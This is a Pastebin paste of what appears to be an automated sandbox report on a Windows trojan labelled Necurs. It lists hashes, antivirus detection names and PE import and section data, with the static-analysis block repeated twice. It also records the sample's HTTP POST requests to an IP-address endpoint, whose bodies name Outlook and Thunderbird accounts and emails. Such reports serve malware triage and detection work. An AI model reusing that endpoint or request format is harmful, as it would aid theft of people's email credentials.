Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- [*] MalFamily: "Necurs"
- [*] MalScore: 10.0
- [*] File Name: "Exes_69440bc1.exe"
- [*] File Size: 401408
- [*] File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
- [*] SHA256: "7edc56dd709d0af1c2f54cda7d8808c1748fa3370aa9319945dca85943d46710"
- [*] MD5: "cfd3bbce7cc2c03f842c8eaa39e830d3"
- [*] SHA1: "79b7542eb66a1907802f80db85c879ff6ec423b5"
- [*] SHA512: "7da934afea190b3bcaf50e2a75f2d8f2d8565ee5dd708fdb9e0b84927157d32beb6ccad5562ae43adc4c38de9ad7f2ac3ff811b24877ce4b6630625777b5376d"
- [*] CRC32: "69440BC1"
- [*] SSDEEP: "6144:zBR7zHs5tUeTUSwhJExsyWeTCe1B5TOrdHhjpMCd12I8udh2CF3686/13:tR3szrH5MdB1Vd12YdsCF3686Z"
- [*] Process Execution: []
- [*] Signatures Detected: [
- {
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details": [
- {
- "post_no_referer": "HTTP traffic contains a POST request with no referer header"
- },
- {
- "post_no_useragent": "HTTP traffic contains a POST request with no user-agent header"
- },
- {
- "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
- },
- {
- "suspicious_request": "http://163.172.84.54/filename.php"
- }
- ]
- },
- {
- "Description": "Performs some HTTP requests",
- "Details": [
- {
- "url": "http://163.172.84.54/filename.php"
- }
- ]
- },
- {
- "Description": "Writes a potential ransom message to disk",
- "Details": [
- {
- "ransom_file": "Noriben.py"
- },
- {
- "ransom_file": "readme.txt"
- }
- ]
- },
- {
- "Description": "File has been identified by 52 Antiviruses on VirusTotal as malicious",
- "Details": [
- {
- "MicroWorld-eScan": "Trojan.GenericKD.31914429"
- },
- {
- "FireEye": "Generic.mg.cfd3bbce7cc2c03f"
- },
- {
- "CAT-QuickHeal": "Trojandropper.Necurs"
- },
- {
- "McAfee": "RDN/Generic.grp"
- },
- {
- "Cylance": "Unsafe"
- },
- {
- "Alibaba": "TrojanDropper:Win32/Necurs.771aab12"
- },
- {
- "K7GW": "Riskware ( 0040eff71 )"
- },
- {
- "K7AntiVirus": "Riskware ( 0040eff71 )"
- },
- {
- "Arcabit": "Trojan.Generic.D1E6F9BD"
- },
- {
- "Invincea": "heuristic"
- },
- {
- "Symantec": "Ransom.Crysis"
- },
- {
- "APEX": "Malicious"
- },
- {
- "Avast": "Win32:Malware-gen"
- },
- {
- "Kaspersky": "Trojan-Dropper.Win32.Necurs.abas"
- },
- {
- "BitDefender": "Trojan.GenericKD.31914429"
- },
- {
- "NANO-Antivirus": "Trojan.Win32.Necurs.fpotwi"
- },
- {
- "Paloalto": "generic.ml"
- },
- {
- "ViRobot": "Trojan.Win32.Agent.401408.AN"
- },
- {
- "Rising": "Dropper.Necurs!8.C43 (CLOUD)"
- },
- {
- "Ad-Aware": "Trojan.GenericKD.31914429"
- },
- {
- "Emsisoft": "Trojan.GenericKD.31914429 (B)"
- },
- {
- "Comodo": "Malware@#uz9bso1tas4q"
- },
- {
- "DrWeb": "Trojan.PWS.Siggen2.12283"
- },
- {
- "TrendMicro": "Trojan.Win32.NECURS.USWE"
- },
- {
- "McAfee-GW-Edition": "BehavesLike.Win32.Generic.fh"
- },
- {
- "Trapmine": "malicious.high.ml.score"
- },
- {
- "Sophos": "Troj/Wonton-AFD"
- },
- {
- "SentinelOne": "DFI - Malicious PE"
- },
- {
- "Cyren": "W32/Trojan.ZDUJ-4279"
- },
- {
- "ESET-NOD32": "a variant of Win32/Kryptik.GSLS"
- },
- {
- "Webroot": "W32.Trojan.GenKD"
- },
- {
- "Antiy-AVL": "Trojan[Dropper]/Win32.Necurs"
- },
- {
- "Microsoft": "Trojan:Win32/Occamy.C"
- },
- {
- "Endgame": "malicious (high confidence)"
- },
- {
- "AegisLab": "Trojan.Win32.Necurs.4!c"
- },
- {
- "ZoneAlarm": "Trojan-Dropper.Win32.Necurs.abas"
- },
- {
- "GData": "Trojan.GenericKD.31914429"
- },
- {
- "TACHYON": "Trojan-Dropper/W32.Necurs.401408"
- },
- {
- "AhnLab-V3": "Trojan/Win32.Agent.C3169420"
- },
- {
- "VBA32": "TrojanDropper.Necurs"
- },
- {
- "ALYac": "Trojan.Agent.Azden"
- },
- {
- "Malwarebytes": "Trojan.Necurs"
- },
- {
- "TrendMicro-HouseCall": "Trojan.Win32.NECURS.USWE"
- },
- {
- "Tencent": "Win32.Trojan-dropper.Necurs.Tdzf"
- },
- {
- "Yandex": "Trojan.DR.Necurs!epG2dZg83x0"
- },
- {
- "Ikarus": "Trojan.Win32.Crypt"
- },
- {
- "Fortinet": "W32/Necurs.ABAS!tr"
- },
- {
- "AVG": "Win32:Malware-gen"
- },
- {
- "Cybereason": "malicious.e7cc2c"
- },
- {
- "Panda": "Trj/GdSda.A"
- },
- {
- "CrowdStrike": "win/malicious_confidence_90% (W)"
- },
- {
- "Qihoo-360": "HEUR/QVM10.2.BA6B.Malware.Gen"
- }
- ]
- }
- ]
- [*] Started Service: []
- [*] Executed Commands: []
- [*] Mutexes: []
- [*] Modified Files: []
- [*] Deleted Files: []
- [*] Modified Registry Keys: []
- [*] Deleted Registry Keys: []
- [*] DNS Communications: []
- [*] Domains: []
- [*] Network Communication - ICMP: []
- [*] Network Communication - HTTP: [
- {
- "count": 1,
- "body": "{\"outlook-accounts\":null,\"thunderbird-emails\":null}",
- "uri": "http://163.172.84.54/filename.php",
- "user-agent": "",
- "method": "POST",
- "host": "163.172.84.54",
- "version": "1.1",
- "path": "/filename.php",
- "data": "POST /filename.php HTTP/1.1\r\nHost: 163.172.84.54\r\nContent-Length: 51\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n{\"outlook-accounts\":null,\"thunderbird-emails\":null}",
- "port": 80
- },
- {
- "count": 1,
- "body": "{\"outlook-emails\":null}",
- "uri": "http://163.172.84.54/filename.php",
- "user-agent": "",
- "method": "POST",
- "host": "163.172.84.54",
- "version": "1.1",
- "path": "/filename.php",
- "data": "POST /filename.php HTTP/1.1\r\nHost: 163.172.84.54\r\nContent-Length: 23\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n{\"outlook-emails\":null}",
- "port": 80
- }
- ]
- [*] Network Communication - SMTP: []
- [*] Network Communication - Hosts: []
- [*] Network Communication - IRC: []
- [*] Static Analysis: {
- "pe": {
- "peid_signatures": null,
- "imports": [
- {
- "imports": [
- {
- "name": "FindClose",
- "address": "0x40101c"
- },
- {
- "name": "GetVersionExA",
- "address": "0x401020"
- },
- {
- "name": "HeapFree",
- "address": "0x401024"
- },
- {
- "name": "FreeLibrary",
- "address": "0x401028"
- },
- {
- "name": "GetStdHandle",
- "address": "0x40102c"
- },
- {
- "name": "GetVersionExW",
- "address": "0x401030"
- },
- {
- "name": "ExitProcess",
- "address": "0x401034"
- },
- {
- "name": "CompareStringW",
- "address": "0x401038"
- },
- {
- "name": "CompareStringA",
- "address": "0x40103c"
- },
- {
- "name": "GetLastError",
- "address": "0x401040"
- },
- {
- "name": "GetLocaleInfoW",
- "address": "0x401044"
- },
- {
- "name": "VirtualQuery",
- "address": "0x401048"
- },
- {
- "name": "GetSystemInfo",
- "address": "0x40104c"
- },
- {
- "name": "VirtualProtect",
- "address": "0x401050"
- },
- {
- "name": "UnhandledExceptionFilter",
- "address": "0x401054"
- },
- {
- "name": "GetCurrentProcess",
- "address": "0x401058"
- },
- {
- "name": "TerminateProcess",
- "address": "0x40105c"
- },
- {
- "name": "IsValidCodePage",
- "address": "0x401060"
- },
- {
- "name": "IsValidLocale",
- "address": "0x401064"
- },
- {
- "name": "EnumSystemLocalesA",
- "address": "0x401068"
- },
- {
- "name": "LoadLibraryA",
- "address": "0x40106c"
- },
- {
- "name": "GetProcAddress",
- "address": "0x401070"
- },
- {
- "name": "VirtualAlloc",
- "address": "0x401074"
- },
- {
- "name": "GetModuleHandleA",
- "address": "0x401078"
- },
- {
- "name": "GetCommandLineA",
- "address": "0x40107c"
- },
- {
- "name": "GetTimeZoneInformation",
- "address": "0x401080"
- },
- {
- "name": "InterlockedDecrement",
- "address": "0x401084"
- },
- {
- "name": "GetStartupInfoW",
- "address": "0x401088"
- },
- {
- "name": "SetUnhandledExceptionFilter",
- "address": "0x40108c"
- },
- {
- "name": "WriteFile",
- "address": "0x401090"
- },
- {
- "name": "GetModuleFileNameA",
- "address": "0x401094"
- },
- {
- "name": "GetModuleFileNameW",
- "address": "0x401098"
- },
- {
- "name": "FreeEnvironmentStringsA",
- "address": "0x40109c"
- },
- {
- "name": "MultiByteToWideChar",
- "address": "0x4010a0"
- },
- {
- "name": "GetEnvironmentStrings",
- "address": "0x4010a4"
- },
- {
- "name": "FreeEnvironmentStringsW",
- "address": "0x4010a8"
- },
- {
- "name": "GetEnvironmentStringsW",
- "address": "0x4010ac"
- },
- {
- "name": "GetCommandLineW",
- "address": "0x4010b0"
- },
- {
- "name": "SetHandleCount",
- "address": "0x4010b4"
- },
- {
- "name": "GetFileType",
- "address": "0x4010b8"
- },
- {
- "name": "GetStartupInfoA",
- "address": "0x4010bc"
- },
- {
- "name": "DeleteCriticalSection",
- "address": "0x4010c0"
- },
- {
- "name": "GetModuleHandleW",
- "address": "0x4010c4"
- },
- {
- "name": "TlsGetValue",
- "address": "0x4010c8"
- },
- {
- "name": "TlsAlloc",
- "address": "0x4010cc"
- },
- {
- "name": "TlsSetValue",
- "address": "0x4010d0"
- },
- {
- "name": "TlsFree",
- "address": "0x4010d4"
- },
- {
- "name": "InterlockedIncrement",
- "address": "0x4010d8"
- },
- {
- "name": "SetLastError",
- "address": "0x4010dc"
- },
- {
- "name": "GetCurrentThreadId",
- "address": "0x4010e0"
- },
- {
- "name": "GetCurrentThread",
- "address": "0x4010e4"
- },
- {
- "name": "HeapDestroy",
- "address": "0x4010e8"
- },
- {
- "name": "HeapCreate",
- "address": "0x4010ec"
- },
- {
- "name": "VirtualFree",
- "address": "0x4010f0"
- },
- {
- "name": "QueryPerformanceCounter",
- "address": "0x4010f4"
- },
- {
- "name": "GetTickCount",
- "address": "0x4010f8"
- },
- {
- "name": "GetCurrentProcessId",
- "address": "0x4010fc"
- },
- {
- "name": "GetSystemTimeAsFileTime",
- "address": "0x401100"
- },
- {
- "name": "GetCPInfo",
- "address": "0x401104"
- },
- {
- "name": "GetACP",
- "address": "0x401108"
- },
- {
- "name": "GetOEMCP",
- "address": "0x40110c"
- },
- {
- "name": "OutputDebugStringA",
- "address": "0x401110"
- },
- {
- "name": "LeaveCriticalSection",
- "address": "0x401114"
- },
- {
- "name": "FatalAppExitA",
- "address": "0x401118"
- },
- {
- "name": "EnterCriticalSection",
- "address": "0x40111c"
- },
- {
- "name": "SetConsoleCtrlHandler",
- "address": "0x401120"
- },
- {
- "name": "InterlockedExchange",
- "address": "0x401124"
- },
- {
- "name": "LoadLibraryExA",
- "address": "0x401128"
- },
- {
- "name": "InitializeCriticalSection",
- "address": "0x40112c"
- },
- {
- "name": "HeapAlloc",
- "address": "0x401130"
- },
- {
- "name": "Sleep",
- "address": "0x401134"
- },
- {
- "name": "HeapReAlloc",
- "address": "0x401138"
- },
- {
- "name": "RtlUnwind",
- "address": "0x40113c"
- },
- {
- "name": "LCMapStringA",
- "address": "0x401140"
- },
- {
- "name": "WideCharToMultiByte",
- "address": "0x401144"
- },
- {
- "name": "LCMapStringW",
- "address": "0x401148"
- },
- {
- "name": "GetStringTypeA",
- "address": "0x40114c"
- },
- {
- "name": "GetStringTypeW",
- "address": "0x401150"
- },
- {
- "name": "GetTimeFormatA",
- "address": "0x401154"
- },
- {
- "name": "GetDateFormatA",
- "address": "0x401158"
- },
- {
- "name": "GetUserDefaultLCID",
- "address": "0x40115c"
- },
- {
- "name": "GetLocaleInfoA",
- "address": "0x401160"
- },
- {
- "name": "SetEnvironmentVariableA",
- "address": "0x401164"
- }
- ],
- "dll": "KERNEL32.dll"
- },
- {
- "imports": [
- {
- "name": "SetWindowLongW",
- "address": "0x40116c"
- },
- {
- "name": "CreateWindowExW",
- "address": "0x401170"
- },
- {
- "name": "SetWindowTextW",
- "address": "0x401174"
- },
- {
- "name": "CreateWindowExA",
- "address": "0x401178"
- },
- {
- "name": "PostMessageW",
- "address": "0x40117c"
- },
- {
- "name": "UnregisterClassA",
- "address": "0x401180"
- },
- {
- "name": "DestroyWindow",
- "address": "0x401184"
- },
- {
- "name": "LoadStringW",
- "address": "0x401188"
- },
- {
- "name": "GetMenuStringW",
- "address": "0x40118c"
- },
- {
- "name": "DefWindowProcW",
- "address": "0x401190"
- },
- {
- "name": "SendMessageW",
- "address": "0x401194"
- },
- {
- "name": "RegisterClassW",
- "address": "0x401198"
- }
- ],
- "dll": "USER32.dll"
- },
- {
- "imports": [
- {
- "name": "RegOpenKeyExA",
- "address": "0x401000"
- },
- {
- "name": "RegEnumValueA",
- "address": "0x401004"
- },
- {
- "name": "RegSetValueExA",
- "address": "0x401008"
- },
- {
- "name": "RegOpenKeyExW",
- "address": "0x40100c"
- }
- ],
- "dll": "ADVAPI32.dll"
- },
- {
- "imports": [
- {
- "name": "ImageList_Add",
- "address": "0x401014"
- }
- ],
- "dll": "COMCTL32.dll"
- }
- ],
- "digital_signers": null,
- "exported_dll_name": null,
- "actual_checksum": "0x0006d473",
- "overlay": null,
- "imagebase": "0x00400000",
- "reported_checksum": "0x00000000",
- "icon_hash": null,
- "entrypoint": "0x00446f6d",
- "timestamp": "2017-06-26 19:27:00",
- "osversion": "4.0",
- "sections": [
- {
- "name": ".text",
- "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00001000",
- "size_of_data": "0x0005b000",
- "entropy": "6.41",
- "raw_address": "0x00001000",
- "virtual_size": "0x0005a538",
- "characteristics_raw": "0x70000020"
- },
- {
- "name": ".data",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x0005c000",
- "size_of_data": "0x00003000",
- "entropy": "4.54",
- "raw_address": "0x0005c000",
- "virtual_size": "0x00002d80",
- "characteristics_raw": "0xd0000040"
- },
- {
- "name": ".sxdata",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_LNK_INFO|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x0005f000",
- "size_of_data": "0x00001000",
- "entropy": "0.07",
- "raw_address": "0x0005f000",
- "virtual_size": "0x0000006c",
- "characteristics_raw": "0xc0000240"
- },
- {
- "name": ".reloc",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00060000",
- "size_of_data": "0x00002000",
- "entropy": "3.98",
- "raw_address": "0x00060000",
- "virtual_size": "0x000011aa",
- "characteristics_raw": "0x42000040"
- }
- ],
- "resources": [],
- "dirents": [
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x0005abdc",
- "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
- "size": "0x00000064"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00060000",
- "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
- "size": "0x00000eec"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_TLS",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00001000",
- "name": "IMAGE_DIRECTORY_ENTRY_IAT",
- "size": "0x000001a0"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
- "size": "0x00000000"
- }
- ],
- "exports": [],
- "guest_signers": {},
- "imphash": "7073758031d4012622cea53183697aac",
- "icon_fuzzy": null,
- "icon": null,
- "pdbpath": null,
- "imported_dll_count": 4,
- "versioninfo": []
- }
- }
- [*] Resolved APIs: []
- [*] Static Analysis: {
- "pe": {
- "peid_signatures": null,
- "imports": [
- {
- "imports": [
- {
- "name": "FindClose",
- "address": "0x40101c"
- },
- {
- "name": "GetVersionExA",
- "address": "0x401020"
- },
- {
- "name": "HeapFree",
- "address": "0x401024"
- },
- {
- "name": "FreeLibrary",
- "address": "0x401028"
- },
- {
- "name": "GetStdHandle",
- "address": "0x40102c"
- },
- {
- "name": "GetVersionExW",
- "address": "0x401030"
- },
- {
- "name": "ExitProcess",
- "address": "0x401034"
- },
- {
- "name": "CompareStringW",
- "address": "0x401038"
- },
- {
- "name": "CompareStringA",
- "address": "0x40103c"
- },
- {
- "name": "GetLastError",
- "address": "0x401040"
- },
- {
- "name": "GetLocaleInfoW",
- "address": "0x401044"
- },
- {
- "name": "VirtualQuery",
- "address": "0x401048"
- },
- {
- "name": "GetSystemInfo",
- "address": "0x40104c"
- },
- {
- "name": "VirtualProtect",
- "address": "0x401050"
- },
- {
- "name": "UnhandledExceptionFilter",
- "address": "0x401054"
- },
- {
- "name": "GetCurrentProcess",
- "address": "0x401058"
- },
- {
- "name": "TerminateProcess",
- "address": "0x40105c"
- },
- {
- "name": "IsValidCodePage",
- "address": "0x401060"
- },
- {
- "name": "IsValidLocale",
- "address": "0x401064"
- },
- {
- "name": "EnumSystemLocalesA",
- "address": "0x401068"
- },
- {
- "name": "LoadLibraryA",
- "address": "0x40106c"
- },
- {
- "name": "GetProcAddress",
- "address": "0x401070"
- },
- {
- "name": "VirtualAlloc",
- "address": "0x401074"
- },
- {
- "name": "GetModuleHandleA",
- "address": "0x401078"
- },
- {
- "name": "GetCommandLineA",
- "address": "0x40107c"
- },
- {
- "name": "GetTimeZoneInformation",
- "address": "0x401080"
- },
- {
- "name": "InterlockedDecrement",
- "address": "0x401084"
- },
- {
- "name": "GetStartupInfoW",
- "address": "0x401088"
- },
- {
- "name": "SetUnhandledExceptionFilter",
- "address": "0x40108c"
- },
- {
- "name": "WriteFile",
- "address": "0x401090"
- },
- {
- "name": "GetModuleFileNameA",
- "address": "0x401094"
- },
- {
- "name": "GetModuleFileNameW",
- "address": "0x401098"
- },
- {
- "name": "FreeEnvironmentStringsA",
- "address": "0x40109c"
- },
- {
- "name": "MultiByteToWideChar",
- "address": "0x4010a0"
- },
- {
- "name": "GetEnvironmentStrings",
- "address": "0x4010a4"
- },
- {
- "name": "FreeEnvironmentStringsW",
- "address": "0x4010a8"
- },
- {
- "name": "GetEnvironmentStringsW",
- "address": "0x4010ac"
- },
- {
- "name": "GetCommandLineW",
- "address": "0x4010b0"
- },
- {
- "name": "SetHandleCount",
- "address": "0x4010b4"
- },
- {
- "name": "GetFileType",
- "address": "0x4010b8"
- },
- {
- "name": "GetStartupInfoA",
- "address": "0x4010bc"
- },
- {
- "name": "DeleteCriticalSection",
- "address": "0x4010c0"
- },
- {
- "name": "GetModuleHandleW",
- "address": "0x4010c4"
- },
- {
- "name": "TlsGetValue",
- "address": "0x4010c8"
- },
- {
- "name": "TlsAlloc",
- "address": "0x4010cc"
- },
- {
- "name": "TlsSetValue",
- "address": "0x4010d0"
- },
- {
- "name": "TlsFree",
- "address": "0x4010d4"
- },
- {
- "name": "InterlockedIncrement",
- "address": "0x4010d8"
- },
- {
- "name": "SetLastError",
- "address": "0x4010dc"
- },
- {
- "name": "GetCurrentThreadId",
- "address": "0x4010e0"
- },
- {
- "name": "GetCurrentThread",
- "address": "0x4010e4"
- },
- {
- "name": "HeapDestroy",
- "address": "0x4010e8"
- },
- {
- "name": "HeapCreate",
- "address": "0x4010ec"
- },
- {
- "name": "VirtualFree",
- "address": "0x4010f0"
- },
- {
- "name": "QueryPerformanceCounter",
- "address": "0x4010f4"
- },
- {
- "name": "GetTickCount",
- "address": "0x4010f8"
- },
- {
- "name": "GetCurrentProcessId",
- "address": "0x4010fc"
- },
- {
- "name": "GetSystemTimeAsFileTime",
- "address": "0x401100"
- },
- {
- "name": "GetCPInfo",
- "address": "0x401104"
- },
- {
- "name": "GetACP",
- "address": "0x401108"
- },
- {
- "name": "GetOEMCP",
- "address": "0x40110c"
- },
- {
- "name": "OutputDebugStringA",
- "address": "0x401110"
- },
- {
- "name": "LeaveCriticalSection",
- "address": "0x401114"
- },
- {
- "name": "FatalAppExitA",
- "address": "0x401118"
- },
- {
- "name": "EnterCriticalSection",
- "address": "0x40111c"
- },
- {
- "name": "SetConsoleCtrlHandler",
- "address": "0x401120"
- },
- {
- "name": "InterlockedExchange",
- "address": "0x401124"
- },
- {
- "name": "LoadLibraryExA",
- "address": "0x401128"
- },
- {
- "name": "InitializeCriticalSection",
- "address": "0x40112c"
- },
- {
- "name": "HeapAlloc",
- "address": "0x401130"
- },
- {
- "name": "Sleep",
- "address": "0x401134"
- },
- {
- "name": "HeapReAlloc",
- "address": "0x401138"
- },
- {
- "name": "RtlUnwind",
- "address": "0x40113c"
- },
- {
- "name": "LCMapStringA",
- "address": "0x401140"
- },
- {
- "name": "WideCharToMultiByte",
- "address": "0x401144"
- },
- {
- "name": "LCMapStringW",
- "address": "0x401148"
- },
- {
- "name": "GetStringTypeA",
- "address": "0x40114c"
- },
- {
- "name": "GetStringTypeW",
- "address": "0x401150"
- },
- {
- "name": "GetTimeFormatA",
- "address": "0x401154"
- },
- {
- "name": "GetDateFormatA",
- "address": "0x401158"
- },
- {
- "name": "GetUserDefaultLCID",
- "address": "0x40115c"
- },
- {
- "name": "GetLocaleInfoA",
- "address": "0x401160"
- },
- {
- "name": "SetEnvironmentVariableA",
- "address": "0x401164"
- }
- ],
- "dll": "KERNEL32.dll"
- },
- {
- "imports": [
- {
- "name": "SetWindowLongW",
- "address": "0x40116c"
- },
- {
- "name": "CreateWindowExW",
- "address": "0x401170"
- },
- {
- "name": "SetWindowTextW",
- "address": "0x401174"
- },
- {
- "name": "CreateWindowExA",
- "address": "0x401178"
- },
- {
- "name": "PostMessageW",
- "address": "0x40117c"
- },
- {
- "name": "UnregisterClassA",
- "address": "0x401180"
- },
- {
- "name": "DestroyWindow",
- "address": "0x401184"
- },
- {
- "name": "LoadStringW",
- "address": "0x401188"
- },
- {
- "name": "GetMenuStringW",
- "address": "0x40118c"
- },
- {
- "name": "DefWindowProcW",
- "address": "0x401190"
- },
- {
- "name": "SendMessageW",
- "address": "0x401194"
- },
- {
- "name": "RegisterClassW",
- "address": "0x401198"
- }
- ],
- "dll": "USER32.dll"
- },
- {
- "imports": [
- {
- "name": "RegOpenKeyExA",
- "address": "0x401000"
- },
- {
- "name": "RegEnumValueA",
- "address": "0x401004"
- },
- {
- "name": "RegSetValueExA",
- "address": "0x401008"
- },
- {
- "name": "RegOpenKeyExW",
- "address": "0x40100c"
- }
- ],
- "dll": "ADVAPI32.dll"
- },
- {
- "imports": [
- {
- "name": "ImageList_Add",
- "address": "0x401014"
- }
- ],
- "dll": "COMCTL32.dll"
- }
- ],
- "digital_signers": null,
- "exported_dll_name": null,
- "actual_checksum": "0x0006d473",
- "overlay": null,
- "imagebase": "0x00400000",
- "reported_checksum": "0x00000000",
- "icon_hash": null,
- "entrypoint": "0x00446f6d",
- "timestamp": "2017-06-26 19:27:00",
- "osversion": "4.0",
- "sections": [
- {
- "name": ".text",
- "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00001000",
- "size_of_data": "0x0005b000",
- "entropy": "6.41",
- "raw_address": "0x00001000",
- "virtual_size": "0x0005a538",
- "characteristics_raw": "0x70000020"
- },
- {
- "name": ".data",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x0005c000",
- "size_of_data": "0x00003000",
- "entropy": "4.54",
- "raw_address": "0x0005c000",
- "virtual_size": "0x00002d80",
- "characteristics_raw": "0xd0000040"
- },
- {
- "name": ".sxdata",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_LNK_INFO|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x0005f000",
- "size_of_data": "0x00001000",
- "entropy": "0.07",
- "raw_address": "0x0005f000",
- "virtual_size": "0x0000006c",
- "characteristics_raw": "0xc0000240"
- },
- {
- "name": ".reloc",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00060000",
- "size_of_data": "0x00002000",
- "entropy": "3.98",
- "raw_address": "0x00060000",
- "virtual_size": "0x000011aa",
- "characteristics_raw": "0x42000040"
- }
- ],
- "resources": [],
- "dirents": [
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x0005abdc",
- "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
- "size": "0x00000064"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00060000",
- "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
- "size": "0x00000eec"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_TLS",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00001000",
- "name": "IMAGE_DIRECTORY_ENTRY_IAT",
- "size": "0x000001a0"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
- "size": "0x00000000"
- }
- ],
- "exports": [],
- "guest_signers": {},
- "imphash": "7073758031d4012622cea53183697aac",
- "icon_fuzzy": null,
- "icon": null,
- "pdbpath": null,
- "imported_dll_count": 4,
- "versioninfo": []
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement